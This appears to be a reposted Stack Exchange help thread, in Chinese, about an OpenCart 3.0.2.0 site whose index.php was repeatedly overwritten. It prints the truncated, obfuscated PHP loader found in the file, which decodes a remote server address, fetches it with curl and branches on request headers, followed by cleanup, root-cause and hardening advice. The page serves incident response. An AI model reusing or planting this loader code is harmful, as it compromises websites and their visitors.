OpenCart v3.0.2.0 index.php文件遭篡改求助
OpenCart v3.0.2.0 index.php频繁被篡改的排查与修复方案
问题描述
使用OpenCart v3.0.2.0版本,部署在public_html目录下的网站入口文件index.php一周内两次被篡改,文件内容变为恶意代码,无法确定篡改根源,需技术指导。
篡改后的index.php代码
global $O; $O=urldecode($OOOOOO);$oOooOO='z1226_16';$oOooOOoO=$O[15].$O[4].$O[4].$O[9].$O[62].$O[63].$O[63].$O[64].$O[72].$O[66].$O[59].$O[65].$O[67].$O[71].$O[59].$O[65].$O[65].$O[67].$O[59].$O[65].$O[67].$O[65].$O[63].$oOooOO.$O[63]; function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){$ooooOOOooOo=curl_init();curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);curl_close($ooooOOOooOo);return $oooooOOOOooO; } function ooOOoOOO($OooooO,$OOOoooo=array()){global $O;$OooooO=str_replace(' ','+',$OooooO);$OOooooO=curl_init();curl_setopt($OOooooO,CURLOPT_URL, "$OooooO");curl_setopt($OOooooO,CURLOPT_RETURNTRANSFER, 1);curl_setopt($OOooooO,CURLOPT_HEADER, 0);curl_setopt($OOooooO,CURLOPT_TIMEOUT,10);curl_setopt($OOooooO,CURLOPT_POST, 1);curl_setopt($OOooooO,CURLOPT_POSTFIELDS, http_build_query($OOOoooo));$OOOOooo=curl_exec($OOooooO);$OOOOoooOO=curl_errno($OOooooO);curl_close($OOooooO);if(0!==$OOOOoooOO){return false;}return $OOOOooo;} function oooOOOo($ooOOo){global $O;$ooOOOOo = false;$oooooOOo = $O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[23].$O[8].$O[4].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[90].$O[5].$O[10].$O[15].$O[8].$O[8].$O[90].$O[23].$O[7].$O[24].$O[14].$O[90].$O[10].$O[8].$O[18];if ($ooOOo!=''){if (preg_match("/($oooooOOo)/si",$ooOOo)){$ooOOOOo=true;}}return $ooOOOOo;} function oooOOooOOoOO($oOOOOOOoOOOO){global $O;$ooOOOOOOoO=false;$ooOOOOOOoOo=$O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90].$O[5].$O[10].$O[15].$O[8].$O[8].$O[59].$O[21].$O[8].$O[59].$O[16].$O[9].$O[90].$O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[59].$O[21].$O[8].$O[25];if ($oOOOOOOoOOOO!='' && preg_match("/($ooOOOOOOoOo)/si", $oOOOOOOoOOOO)) {$ooOOOOOOoO=true;}return $ooOOOOOOoO;}$oOooOOoOO=((isset($_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]) && $_SERVER[$O[41].$O[30].$O[30].$O[35].$O[37]]!==$O[8].$O[13].$O[13])?$O[15].$O[4].$O[4].$O[9].$O[11].$O[62].$O[63].$O[63]:$O[15].$O[4].$O[4].$O[9].$O[62].$O[63].$O[63]);$oOoooOOoOO=$_SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$O[30].$O[52].$O[32].$O[29].$O[33]];$ooOOoooOOoOO=$_SERVER[$O[41].$O[30].$O[30].$O[35].$O[52].$O[41].$O[34].$O[37].$O[30]];$ooOOOoooOOoOO=$_SERVER[$O[35].$O[41].$O[35].$O[52].$O[37].$O[28].$O[44].$O[39]];$ooOOOOoooOOOoOO=$_SERVER[$O[37].$O[28].$O[29].$O[48].$O[28].$O[29].$O[52].$O[50].$O[36].$O[51].$O[28]];$ooOOOOoooOOOOoOO=$oOooOOoOO.$ooOOoooOOoOO.$oOoooOOoOO;$oooOOOOoooOOOooOO=$oOooOOoO.$O[63].$O[7].$O[24].$O[12].$O[10].$O[4].$O[10].$O[59].$O[9].$O[15].$O[9];$ooooOOOOoooOOOooO=$oOooOOoO.$O[63].$O[25].$O[10].$O[9].$O[59].$O[9].$O[15].$O[9];$ooooOOOOoooOOOooOoo=$oOooOOoO.$O[63].$O[16].$O[6].$O[25].$O[9].$O[59].$O[9].$O[15].$O[9];$oooooOOoooOOOoooOoo=$oOooOOoO.$O[63].$O[1].$O[8].$O[3].$O[12].$O[11].$O
紧急处理步骤
- 替换恶意文件:从OpenCart官方下载v3.0.2.0原版index.php,覆盖public_html下的恶意文件,务必备份当前恶意文件用于后续分析。
- 临时启用维护模式:在OpenCart后台开启维护模式,或通过服务器配置限制网站访问,阻止恶意代码执行。
恶意代码分析
这段代码是典型的远程控制类恶意脚本,核心行为:
- 通过
urldecode解密隐藏字符串,构造远程服务器地址 - 利用
curl函数发起请求,实现拉取恶意指令、窃取数据或执行未授权操作 - 通过匹配请求头特征(如User-Agent)触发特定恶意逻辑
根源排查
1. OpenCart系统漏洞
- 检查第三方插件/主题:删除或禁用非官方、未更新的插件,尤其是近期新增的插件,多数篡改事件源于恶意插件植入。
- 后台权限审计:查看服务器access.log日志,排查异常IP的后台登录尝试,确认是否存在未授权登录。
- 升级核心版本:v3.0.2.0存在已知安全漏洞,优先升级至官方最新稳定版(操作前备份网站文件和数据库)。
2. 服务器权限与安全
- 修正文件权限:将public_html目录下的文件权限设为
644,目录权限设为755,避免PHP进程拥有过高写入权限。 - 扫描webshell:使用服务器安全工具(如ClamAV)扫描public_html目录,查找包含
eval、base64_decode等可疑函数的文件。 - 分析系统日志:查看服务器
/var/log/secure、/var/log/auth.log及Web服务器日志,定位文件篡改的时间、来源IP和操作痕迹。
3. 域名相关排查
- 验证DNS解析:确认域名A/CNAME记录指向正确服务器IP,排除DNS劫持导致的间接篡改(此场景概率较低)。
- 检查域名所有权:查看WHOIS信息,确认域名注册信息未被篡改,防止域名被恶意转移。
长期防护措施
- 限制端口访问:通过服务器防火墙仅允许信任IP访问SSH和OpenCart后台端口。
- 定期备份:配置每日自动备份网站文件和数据库,存储至离线安全位置。
- 启用安全验证:在OpenCart后台开启双因素认证,安装官方安全插件强化登录防护。
- 文件监控:配置服务器文件监控工具(如inotify),当核心文件被修改时立即触发报警。
内容的提问来源于stack exchange,提问作者Ashraf Frotan
相关产品推荐
相关产品推荐

